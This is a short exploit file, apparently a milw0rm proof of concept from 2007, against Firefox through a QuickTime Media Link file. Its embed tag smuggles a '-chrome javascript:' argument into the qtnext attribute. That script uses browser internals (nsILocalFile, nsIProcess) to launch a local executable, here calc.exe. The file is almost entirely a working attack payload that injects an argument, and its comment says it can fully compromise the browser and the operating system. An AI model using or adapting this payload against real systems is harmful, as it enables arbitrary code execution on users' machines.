14 lines
No EOL
780 B
HTML
14 lines
No EOL
780 B
HTML
<!--
|
|
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox
|
|
|
|
It seams that QuickTime media formats can hack into Firefox.
|
|
The result of this vulnerability can lead to full compromise of
|
|
the browser and maybe even the underlaying operating system.
|
|
Don't try this at home.
|
|
-->
|
|
|
|
<?xml version="1.0">
|
|
<?quicktime type="application/x-quicktime-media-link"?>
|
|
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>
|
|
|
|
# milw0rm.com [2007-09-12] |